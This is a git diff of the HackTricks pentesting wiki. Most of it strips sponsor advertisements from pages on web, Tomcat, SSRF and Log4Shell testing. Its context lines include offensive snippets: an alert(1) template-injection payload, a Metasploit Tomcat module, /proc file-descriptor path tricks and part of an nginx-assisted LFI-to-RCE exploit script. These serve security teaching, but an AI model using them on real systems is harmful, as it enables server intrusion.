- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md index 05af3dba0..d3885c919 100644 --- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md +++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md @@ -16,20 +16,6 @@ Learn & practice GCP Hacking:
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Signaling Protocols ### SIP (Session Initiation Protocol) @@ -122,17 +108,6 @@ SDP's simplicity and flexibility make it a widely adopted standard for describin These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks. -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md index b23b85a23..50d12739a 100644 --- a/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md +++ b/network-services-pentesting/pentesting-web/electron-desktop-apps/README.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Introduction @@ -350,18 +337,6 @@ npm start * More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking) * [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index f5efe140f..4c80f7908 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - Test executable file extensions: * asp @@ -299,18 +285,6 @@ HTTP/1.1 401 Unauthorized HTTP/1.1 200 OK ``` -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md index f22f414b5..bc9a5b66b 100644 --- a/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md +++ b/network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### SSRF PHP functions Some function such as **file\_get\_contents(), fopen(), file(), md5\_file()** accept URLs as input that they will follow making **possible SSRF vulnerabilities** if the use can control the data: @@ -89,12 +81,6 @@ $context = stream_context_create($options); $file = file_get_contents($url, false, $context); ``` -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-web/tomcat.md b/network-services-pentesting/pentesting-web/tomcat.md index 83f63d4c2..a5e46cae3 100644 --- a/network-services-pentesting/pentesting-web/tomcat.md +++ b/network-services-pentesting/pentesting-web/tomcat.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Discovery * It usually runs on **port 8080** @@ -269,12 +261,6 @@ msf> use post/windows/gather/enum_tomcat * [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat) * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/network-services-pentesting/pentesting-web/tomcat/README.md b/network-services-pentesting/pentesting-web/tomcat/README.md index 99fefe560..47938c7b3 100644 --- a/network-services-pentesting/pentesting-web/tomcat/README.md +++ b/network-services-pentesting/pentesting-web/tomcat/README.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Discovery * It usually runs on **port 8080** @@ -269,11 +261,6 @@ msf> use post/windows/gather/enum_tomcat * [https://github.com/simran-sankhala/Pentest-Tomcat](https://github.com/simran-sankhala/Pentest-Tomcat) * [https://hackertarget.com/sample/nexpose-metasploitable-test.pdf](https://hackertarget.com/sample/nexpose-metasploitable-test.pdf) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md index 11fa6b4a3..ef2af059f 100644 --- a/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md +++ b/network-services-pentesting/pentesting-web/tomcat/basic-tomcat-info.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### Avoid to run with root In order to not run Tomcat with root a very common configuration is to set an Apache server in port 80/443 and, if the requested path matches a regexp, the request is sent to Tomcat running on a different port. @@ -160,11 +152,6 @@ The file shows us what each of the roles `manager-gui`, `manager-script`, `manag * [https://academy.hackthebox.com/module/113/section/1090](https://academy.hackthebox.com/module/113/section/1090) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/2fa-bypass.md b/pentesting-web/2fa-bypass.md index 49c2b7873..cb67bb01e 100644 --- a/pentesting-web/2fa-bypass.md +++ b/pentesting-web/2fa-bypass.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## **Enhanced Two-Factor Authentication Bypass Techniques** @@ -151,17 +138,6 @@ In case the OTP is created based on data the user already has or that is sending * [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718) * [https://getpocket.com/read/aM7dap2bTo21bg6fRDAV2c5thng5T48b3f0Pd1geW2u186eafibdXj7aA78Ip116\_1d0f6ce59992222b0812b7cab19a4bce](https://getpocket.com/read/aM7dap2bTo21bg6fRDAV2c5thng5T48b3f0Pd1geW2u186eafibdXj7aA78Ip116\_1d0f6ce59992222b0812b7cab19a4bce) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} P diff --git a/pentesting-web/bypass-payment-process.md b/pentesting-web/bypass-payment-process.md index 67faf6ac2..1d3a44269 100644 --- a/pentesting-web/bypass-payment-process.md +++ b/pentesting-web/bypass-payment-process.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Payment Bypass Techniques ### Request Interception @@ -53,12 +45,6 @@ If you encounter a parameter that contains a URL, especially one following the p 1. **Intercept Responses**: Use tools to intercept and analyze the responses from the server. Look for any data that might indicate a successful transaction or reveal the next steps in the payment process. 2. **Modify Responses**: Attempt to modify the responses before they are processed by the browser or the application to simulate a successful transaction scenario. -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/captcha-bypass.md b/pentesting-web/captcha-bypass.md index dfb3f8645..62878239a 100644 --- a/pentesting-web/captcha-bypass.md +++ b/pentesting-web/captcha-bypass.md @@ -45,9 +45,6 @@ To **bypass** the captcha during **server testing** and automate user input func ## Online Services to solve captchas -### [Capsolver](https://www.capsolver.com/) - -Capsolver's automatic captcha solver offers an **affordable and quick captcha-solving solution**. You may rapidly combine it with your program using its simple integration option to achieve the best results in a matter of seconds. It can solve reCAPTCHA V2 and V3, hCaptcha, FunCaptcha, datadome, aws captcha, picture-to-text, binance / coinmarketcap captcha, geetest v3, and more. However, this is not a bypass per-se. {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/client-side-template-injection-csti.md b/pentesting-web/client-side-template-injection-csti.md index c9ffcc117..78656d3bf 100644 --- a/pentesting-web/client-side-template-injection-csti.md +++ b/pentesting-web/client-side-template-injection-csti.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -#### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Summary @@ -112,17 +99,7 @@ javascript:alert(1)%252f%252f..%252fcss-images {% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %} -#### [WhiteIntel](https://whiteintel.io) -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md index f9c8b6049..e966d65df 100644 --- a/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md +++ b/pentesting-web/deserialization/jndi-java-naming-and-directory-interface-and-log4shell.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Basic Information JNDI, integrated into Java since the late 1990s, serves as a directory service, enabling Java programs to locate data or objects through a naming system. It supports various directory services via service provider interfaces (SPIs), allowing data retrieval from different systems, including remote Java objects. Common SPIs include CORBA COS, Java RMI Registry, and LDAP. @@ -484,11 +476,6 @@ In this [**writeup**](https://intrigus.org/research/2022/07/18/google-ctf-2022-l * [https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/](https://intrigus.org/research/2022/07/18/google-ctf-2022-log4j2-writeup/) * [https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/](https://sigflag.at/blog/2022/writeup-googlectf2022-log4j/) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md index 79f623cd4..c25555200 100644 --- a/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md +++ b/pentesting-web/deserialization/nodejs-proto-prototype-pollution/express-prototype-pollution-gadgets.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Serve XSS responses **For further details** [**take a look to the original reserach**](https://portswigger.net/research/server-side-prototype-pollution) @@ -149,17 +135,6 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio * [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md index 611337872..bfd8bb733 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md @@ -15,20 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -#### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ### `compress.zlib://` and `PHP_STREAM_PREFER_STDIO` A file opened using the protocol `compress.zlib://` with the flag `PHP_STREAM_PREFER_STDIO` can continue writing data that arrives to the connection later to the same file. @@ -67,18 +53,6 @@ However, there is a check in the web server that **prevents loading files that c For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) -#### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md index f0ba112c2..78c85e3e6 100644 --- a/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md +++ b/pentesting-web/file-inclusion/lfi2rce-via-nginx-temp-files.md @@ -15,27 +15,13 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** - ## Vulnerable configuration [**Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/**](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) * PHP code: -\`\`\`\`h\` +```php /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:56 1 -> /dev/pts/0 lrwx------ 1 www-data www-data 64 Dec 25 23:49 10 -> anon\_inode:\[eventfd] lrwx------ 1 www-data www-data 64 Dec 25 23:49 11 -> socket:\[27587] lrwx------ 1 www-data www-data 64 Dec 25 23:49 12 -> socket:\[27589] lrwx------ 1 www-data www-data 64 Dec 25 23:56 13 -> socket:\[44926] lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:\[44927] lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted) ... \`\`\` Note: One cannot directly include \`/proc/34/fd/15\` in this example as PHP's \`include\` function would resolve the path to \`/var/lib/nginx/body/0000001368 (deleted)\` which doesn't exist in in the filesystem. This minor restriction can luckily be bypassed by some indirection like: \`/proc/self/fd/34/../../../34/fd/15\` which will finally execute the content of the deleted \`/var/lib/nginx/body/0000001368\` file. ## Full Exploit \`\`\`python #!/usr/bin/env python3 import sys, threading, requests # exploit PHP local file inclusion (LFI) via nginx's client body buffering assistance # see https://bierbaumer.net/security/php-lfi-with-nginx-assistance/ for details URL = f'http://{sys.argv\[1]}:{sys.argv\[2]}/' # find nginx worker processes r = requests.get(URL, params={ 'file': '/proc/cpuinfo' }) cpus = r.text.count('processor') r = requests.get(URL, params={ 'file': '/proc/sys/kernel/pid\_max' }) pid\_max = int(r.text) print(f'\[\*] cpus: {cpus}; pid\_max: {pid\_max}') nginx\_workers = \[] for pid in range(pid\_max): r = requests.get(URL, params={ 'file': f'/proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'\[\*] nginx worker found: {pid}') nginx\_workers.append(pid) if len(nginx\_workers) >= cpus: break done = False # upload a big client body to force nginx to create a /var/lib/nginx/body/$X def uploader(): print('\[+] starting uploader') while not done: requests.get(URL, data=' //' @@ -71,17 +57,7 @@ if **name** == "**main**": print('\[DEBUG] Creating requests session') requests\ * [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/) -### [WhiteIntel](https://whiteintel.io) -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -
{% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md b/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md index d1dde4916..68bfeea4b 100644 --- a/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md +++ b/pentesting-web/formula-csv-doc-latex-ghostscript-injection.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## Formula Injection ### Info @@ -218,11 +210,6 @@ From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130) * [https://salmonsec.com/cheatsheet/latex\_injection](https://salmonsec.com/cheatsheet/latex\_injection) * [https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/](https://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/h2c-smuggling.md b/pentesting-web/h2c-smuggling.md index ca2cd488e..4e4778bc6 100644 --- a/pentesting-web/h2c-smuggling.md +++ b/pentesting-web/h2c-smuggling.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ### H2C Smuggling #### HTTP2 Over Cleartext (H2C) @@ -114,12 +106,6 @@ Check the labs to test both scenarios in [https://github.com/0ang3el/websocket-s * [https://github.com/0ang3el/websocket-smuggle.git](https://github.com/0ang3el/websocket-smuggle.git) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) diff --git a/pentesting-web/hacking-with-cookies/README.md b/pentesting-web/hacking-with-cookies/README.md index eb0e73427..79df87026 100644 --- a/pentesting-web/hacking-with-cookies/README.md +++ b/pentesting-web/hacking-with-cookies/README.md @@ -15,13 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** ## Cookie Attributes @@ -282,11 +275,6 @@ There should be a pattern (with the size of a used block). So, knowing how are a * [https://blog.ankursundara.com/cookie-bugs/](https://blog.ankursundara.com/cookie-bugs/) * [https://www.linkedin.com/posts/rickey-martin-24533653\_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd](https://www.linkedin.com/posts/rickey-martin-24533653\_100daysofhacking-penetrationtester-ethicalhacking-activity-7016286424526180352-bwDd) -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/postmessage-vulnerabilities/README.md b/pentesting-web/postmessage-vulnerabilities/README.md index d780efc5d..d33ebafd6 100644 --- a/pentesting-web/postmessage-vulnerabilities/README.md +++ b/pentesting-web/postmessage-vulnerabilities/README.md @@ -17,19 +17,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Send **PostMessage** @@ -247,17 +234,6 @@ For **more information**: * [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd) * To practice: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/registration-vulnerabilities.md b/pentesting-web/registration-vulnerabilities.md index 59a75e8ff..f2f3286ef 100644 --- a/pentesting-web/registration-vulnerabilities.md +++ b/pentesting-web/registration-vulnerabilities.md @@ -15,19 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} - -*** ## Registration Takeover @@ -206,17 +193,6 @@ JSON Web Token might be used to authenticate an user. * [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover) -### [WhiteIntel](https://whiteintel.io) - -
- -[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**. - -Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware. - -You can check their website and try their engine for **free** at: - -{% embed url="https://whiteintel.io" %} {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index aa5b6b5b7..9d69a0401 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -15,14 +15,6 @@ Learn & practice GCP Hacking: {% endhint %} -**Try Hard Security Group** - -
- -{% embed url="https://discord.gg/tryhardsecurity" %} - -*** - ## AWS ### Abusing SSRF in AWS EC2 environment @@ -589,12 +581,6 @@ Rancher's metadata can be accessed using: * `curl http://rancher-metadata//` -**Try Hard Security Group** - -
